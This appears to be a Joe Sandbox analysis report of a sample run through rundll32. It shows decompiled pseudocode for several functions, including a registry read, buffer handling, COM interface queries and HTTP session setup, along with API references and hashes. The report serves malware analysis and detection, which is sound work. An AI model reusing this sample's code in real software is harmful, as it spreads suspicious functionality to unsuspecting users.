API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: f4830a55842b958c7b36ab01a67745f689e9510e5020072728c0b4269727d5c3
Instruction ID: 90f515f58112b5986cdaacdbfef951db84e34f6e700b834325fc590a0565cc2d
Opcode Fuzzy Hash: f4830a55842b958c7b36ab01a67745f689e9510e5020072728c0b4269727d5c3
Instruction Fuzzy Hash: 9C11AC73684201AFDB01CF66CC8CF8F77ECAB04600F55096AF509DB260D770E6989B91

Uniqueness

Uniqueness Score: -1.00%

Function 044426AF, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044426AF(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x444a2d4; // 0xefd5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x444ba40; // 0x4f0053
				_v16 = 4;
				_t31 = E04445F0D(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x444a2d4; // 0xefd5a8
					_t5 = _t19 + 0x444ba9c; // 0x6e0049
					_t34 = E04445F0D(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E044430D1(_t34);
					}
					E044430D1(_t31);
				}
				return _v8;
			}

0x044426b5
0x044426ba
0x044426bf
0x044426c6
0x044426d2
0x044426d6
0x044426d8
0x044426de
0x044426ea
0x044426ee
0x04442701
0x04442709
0x0444271d
0x04442725
0x04442727
0x04442727
0x0444272e
0x0444272e
0x04442735
0x04442735
0x0444273b
0x04442740
0x04442746

APIs

Part of subcall function 04445F0D: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044426D2,004F0053,00000000,?), ref: 04445F16
Part of subcall function 04445F0D: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044426D2,004F0053,00000000,?), ref: 04445F40
Part of subcall function 04445F0D: memset.NTDLL ref: 04445F54

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 04442701
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0444271D
RegCloseKey.ADVAPI32(00000000), ref: 0444272E

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 2c9814a27efda64e34890781a40fc0dfeb724d62655c46a023f6cc3c5d19cf7e
Instruction ID: 3b8d828f0dbcf6e65b6b4802fca726d7bf5bc2ec94244e7ac77dfdecd4e3597f
Opcode Fuzzy Hash: 2c9814a27efda64e34890781a40fc0dfeb724d62655c46a023f6cc3c5d19cf7e
Instruction Fuzzy Hash: 25110C76600209BBFB11DBE5DC85FAEB7BCEB84744F14006AB611E6141EB74EA049B20

Uniqueness

Uniqueness Score: -1.00%

Function 70303926, Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

__NMSG_WRITE.LIBCMTD ref: 70303928

Part of subcall function 70302400: GetStdHandle.KERNEL32(000000F4,?,?,702EFABF,?), ref: 7030249E
Part of subcall function 70302400: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,?,?,702EFABF,?), ref: 703024DC

___crtExitProcess.LIBCMTD ref: 70303935

Part of subcall function 702FBC70: ___crtCorExitProcess.LIBCMTD ref: 702FBC79
Part of subcall function 702FBC70: ExitProcess.KERNEL32 ref: 702FBC85

RtlAllocateHeap.NTDLL(7037E1FC,00000000,00000001), ref: 70303968

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: ExitProcess$___crt$AllocateFileHandleHeapWrite
String ID:
API String ID: 1121486014-0
Opcode ID: 253712ce190cb71fcd43609f2b92fbf86c254dc5911c00389f5e1e1d24eb5d80
Instruction ID: e0c728f1de3d980f6c61015f4c9194c156b97be2ea9e6a4ecd8b2f4e6ede7d2b
Opcode Fuzzy Hash: 253712ce190cb71fcd43609f2b92fbf86c254dc5911c00389f5e1e1d24eb5d80
Instruction Fuzzy Hash: E3E0D8B2901209EFEB008B51DC86B6E373D9B01308F208169E94A0A280D7B5A9C1DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04444E94, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04444E94(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04441EF5(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x444a324, 0x110);
					_t27 =  *0x444a328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04442CDC(0x110, _a4, _a4, _t27, 0);
					}
					if(E04443498( &_v36) != 0) {
						_t35 = E04444CEA(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E0444749F(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E044430D1(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E044430D1(_a4);
				}
				return _v16;
			}

0x04444e9a
0x04444e9f
0x04444eac
0x04444eaf
0x04444eb2
0x04444eb9
0x04444ebc
0x04444eca
0x04444ecf
0x04444ed4
0x04444ed9
0x04444edb
0x04444ee4
0x04444ee4
0x04444ef3
0x04444f08
0x04444f0f
0x04444f16
0x04444f1c
0x04444f22
0x04444f2a
0x04444f30
0x04444f33
0x04444f40
0x04444f45
0x04444f49
0x04444f49
0x04444f0f
0x04444f54
0x04444f5f
0x04444f5f
0x04444f6b

APIs

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

memcpy.NTDLL(00000000,00000110,0444773A,0444773A,?,?,0444773A,?,?,044421ED,?), ref: 04444ECA
memset.NTDLL ref: 04444F40
memset.NTDLL ref: 04444F54

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 55b7b64833d5dddfd805aeaa2274c471b552b9ca86f07ddd8dec1d421f8e0dcc
Instruction ID: 7347167bf062be67790a0fce9449f9c0b832609e2c00e21705535a80b20f3422
Opcode Fuzzy Hash: 55b7b64833d5dddfd805aeaa2274c471b552b9ca86f07ddd8dec1d421f8e0dcc
Instruction Fuzzy Hash: EE21E275A00118ABFF11EF96CC41FEEBBB8AF98654F04405AFD04A6251D734E6418B64

Uniqueness

Uniqueness Score: -1.00%

Function 702F132F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

QQ, xrefs: 702F1329

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: b0fae834d55cbee649d58cab8152575cf79ca79b63f4bbc9f06bcb9728e4d885
Instruction ID: 0bed56deeadaaf3e58e0fbc44a4c7089af2c4691521a239c0cc697ab704756b1
Opcode Fuzzy Hash: b0fae834d55cbee649d58cab8152575cf79ca79b63f4bbc9f06bcb9728e4d885
Instruction Fuzzy Hash: CE01F6B6B0410EEBDB05CF94C940A9EB3B9AF48384F508198F9098B740D339FA61DB51

Uniqueness

Uniqueness Score: -1.00%

Function 70322FF0, Relevance: 3.2, APIs: 2, Instructions: 161COMMONLIBRARYCODE

Download Yara Rule

APIs

_setlocale.LIBCMTD ref: 70323087
GetTempPathW.KERNEL32(0000062B,70389690,?,?,7037C704,?,?,70328408,000000FF,?,702EFFBA,?,00000001,?), ref: 703230C0

Part of subcall function 70322400: GetSystemDirectoryW.KERNEL32(7037E670,0000062B), ref: 70322569

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: DirectoryPathSystemTemp_setlocale
String ID:
API String ID: 874358084-0
Opcode ID: 27577aa95f31ac2a0cd71129e905adfdd957a7e0c38df4e0e08985c8b0f34a56
Instruction ID: fb1d00cb139e730a6a30b0ae44af82d45a0f2749b804d198ba889563fa711890
Opcode Fuzzy Hash: 27577aa95f31ac2a0cd71129e905adfdd957a7e0c38df4e0e08985c8b0f34a56
Instruction Fuzzy Hash: 1681F9B69001068FC714DF5BDDC1B6DB7B9FB88304B249229D8199B366DB31754ACF80

Uniqueness

Uniqueness Score: -1.00%

Function 04442238, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E04442238(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x444a2d4; // 0xefd5a8
				_t4 = _t49 + 0x444b448; // 0x53489f0
				_t5 = _t49 + 0x444b438; // 0x9ba05972
				_t51 =  *0x444a140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x444a2d4; // 0xefd5a8
						_t30 = _t56 + 0x444b428; // 0x53489d0
						_t31 = _t56 + 0x444b458; // 0x4c96be40
						_t58 =  *0x444a114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x444a2d4; // 0xefd5a8
											_t23 = _t76 + 0x444b428; // 0x53489d0
											_t24 = _t76 + 0x444b458; // 0x4c96be40
											_t105 =  *0x444a114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x444a2d4; // 0xefd5a8
													_t67 = _v28;
													_t40 = _t99 + 0x444b418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x04442243
0x04442245
0x0444224c
0x0444224d
0x0444224e
0x0444224f
0x04442255
0x0444225a
0x04442264
0x0444226b
0x04442271
0x04442275
0x0444227b
0x04442283
0x04442284
0x04442289
0x0444228a
0x0444228c
0x0444228f
0x04442290
0x04442291
0x04442297
0x0444232c
0x04442331
0x04442338
0x04442342
0x04442348
0x0444234a
0x04442350
0x00000000
0x0444229d
0x0444229d
0x044422a4
0x044422ad
0x044422b1
0x044422b7
0x044422ba
0x04442321
0x00000000
0x044422bc
0x044422bc
0x04442353
0x04442355
0x00000000
0x00000000
0x044422c2
0x044422c2
0x044422c2
0x044422c9
0x044422cf
0x044422d4
0x044422dc
0x044422dd
0x044422de
0x044422e0
0x044422e4
0x044422e8
0x00000000
0x044422ea
0x044422ee
0x044422f3
0x044422fa
0x0444230a
0x0444230c
0x04442312
0x04442317
0x04442357
0x04442357
0x04442364
0x04442368
0x0444236d
0x04442373
0x04442378
0x04442382
0x04442384
0x0444238a
0x0444238a
0x0444238d
0x04442393
0x00000000
0x00000000
0x00000000
0x04442317
0x00000000
0x04442319
0x04442319
0x0444231a
0x00000000
0x0444231f
0x044422bc
0x044422ba
0x044422b1
0x04442396
0x04442396
0x0444239c
0x0444239c
0x044423a5

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053489D0,04445886,?,?,?,?,?,?,?,?,?,?,?,04445886), ref: 04442304
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053489D0,04445886,?,?,?,?,?,?,?,04445886,00000000,00000000,00000000,006D0063), ref: 04442342

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 6a65f326737ab709c6cd1ab7470415a4bc81b82e6177edd30efafe4a555e14ff
Instruction ID: aca57b816f5bc60ff445b93d63ab42e10150a4a6205fa2c000b01d1c707017af
Opcode Fuzzy Hash: 6a65f326737ab709c6cd1ab7470415a4bc81b82e6177edd30efafe4a555e14ff
Instruction Fuzzy Hash: 0C513175A00119AFDB00DFE4C888DAEB7B8FF88710B048599FA05EB251D775ED41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0444421E, Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0444421E(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E04442DDF(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E044430D1(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E04442DDF(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x7024f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E044430D1(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E04442DDF(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x444a2d4; // 0xefd5a8
										_t21 = _t45 + 0x444b76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E044430D1(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}

0x0444421e
0x0444422d
0x04444233
0x04444369
0x04444369
0x04444239
0x04444239
0x0444423f
0x04444241
0x0444424f
0x0444424a
0x0444424a
0x0444424a
0x0444425d
0x04444264
0x04444267
0x0444426f
0x00000000
0x04444275
0x04444277
0x0444427e
0x04444281
0x00000000
0x04444287
0x0444428a
0x04444290
0x044442a7
0x044442b0
0x044442b9
0x044442bc
0x044442c4
0x00000000
0x044442ca
0x044442d2
0x044442d5
0x044442de
0x044442e1
0x00000000
0x044442e7
0x044442ea
0x044442f5
0x044442f5
0x044442ff
0x04444308
0x0444430b
0x04444310
0x04444315
0x00000000
0x04444317
0x04444322
0x04444329
0x04444331
0x04444333
0x04444341
0x04444341
0x04444343
0x04444348
0x04444349
0x0444434b
0x04444352
0x00000000
0x04444354
0x04444354
0x04444359
0x0444435a
0x0444435c
0x04444363
0x00000000
0x04444365
0x04444365
0x04444365
0x04444363
0x04444352
0x04444315
0x044442e1
0x04444292
0x0444429d
0x044442a1
0x00000000
0x00000000
0x00000000
0x00000000
0x044442a1
0x04444290
0x04444281
0x0444426f
0x04444372

APIs

Part of subcall function 04442DDF: lstrlen.KERNEL32(?,00000000,05349CC0,7742C740,04442908,05349EC5,044464C9,044464C9,?,044464C9,?,69B25F44,E8FA7DD7,00000000), ref: 04442DE6
Part of subcall function 04442DDF: mbstowcs.NTDLL ref: 04442E0F
Part of subcall function 04442DDF: memset.NTDLL ref: 04442E21

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,044465A8,74B481D0,00000000,05349698,?,?,04441BC3,?,05349698,0000EA60), ref: 04444239
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,044465A8,74B481D0,00000000,05349698,?,?,04441BC3,?,05349698,0000EA60), ref: 04444369

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: 03a167c6aeb2822365915dd9587436d605d40680466f787ac77efbe8e2e694a6
Instruction ID: 65b5db6d7e1706c080f8c0b22d5e8072e3e360b4a36af4861a8ac8d975cc99c2
Opcode Fuzzy Hash: 03a167c6aeb2822365915dd9587436d605d40680466f787ac77efbe8e2e694a6
Instruction Fuzzy Hash: 68412CB5600609BFFF309F61CC45FAB7AB9FF84B84F00452AB60596191DB71EA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04445722, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04445722(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E044415B4(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x444a2d4; // 0xefd5a8
						_t20 = _t68 + 0x444b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04442D17(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x04445728
0x0444572b
0x0444573b
0x04445744
0x04445748
0x04445816
0x0444581c
0x0444581c
0x04445762
0x04445767
0x0444576b
0x04445771
0x04445776
0x0444577d
0x0444578c
0x0444578c
0x04445790
0x04445792
0x0444579e
0x044457a9
0x044457b4
0x044457b8
0x044457c2
0x044457c6
0x044457c8
0x044457cd
0x044457d4
0x044457e4
0x044457e4
0x044457cd
0x044457c6
0x044457e6
0x044457eb
0x044457f0
0x044457f0
0x044457f6
0x044457fc
0x04445801
0x04445801
0x04445806
0x0444580b
0x0444580b
0x04445806
0x04445790
0x0444580d
0x04445813
0x00000000

APIs

Part of subcall function 044415B4: SysAllocString.OLEAUT32(80000002), ref: 0444160B
Part of subcall function 044415B4: SysFreeString.OLEAUT32(00000000), ref: 04441670

SysFreeString.OLEAUT32(?), ref: 04445801
SysFreeString.OLEAUT32(04445BCC), ref: 0444580B

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: e16144a98d278e8c741a02bff66bb56a98b51a132d9af74ecac2388c1fb4d241
Instruction ID: a82214226dc275086407ddd9bfcb4f8d41c79a4d999ba96fa8bd32d349ce6e3f
Opcode Fuzzy Hash: e16144a98d278e8c741a02bff66bb56a98b51a132d9af74ecac2388c1fb4d241
Instruction Fuzzy Hash: 8E316576900108FFDF21DFA9C888C9BBB79FBC9740B214669F9059B210E631AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04442977, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04442977(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x444a2d4; // 0xefd5a8
				_t2 = _t42 + 0x444b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x444a2d4; // 0xefd5a8
					_t6 = _t45 + 0x444b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x444a2d4; // 0xefd5a8
							_t30 = _v8;
							_t12 = _t48 + 0x444b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x04442983
0x04442984
0x0444298a
0x04442991
0x04442993
0x04442997
0x0444299b
0x0444299d
0x044429a6
0x044429ac
0x044429b4
0x044429b6
0x044429ba
0x044429bc
0x044429c9
0x044429cd
0x044429d2
0x044429d8
0x044429dd
0x044429e5
0x044429e7
0x044429e9
0x044429ef
0x044429ef
0x044429f2
0x044429f8
0x044429f8
0x044429fb
0x04442a01
0x04442a01
0x04442a08

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 044429B4
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 044429E5

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

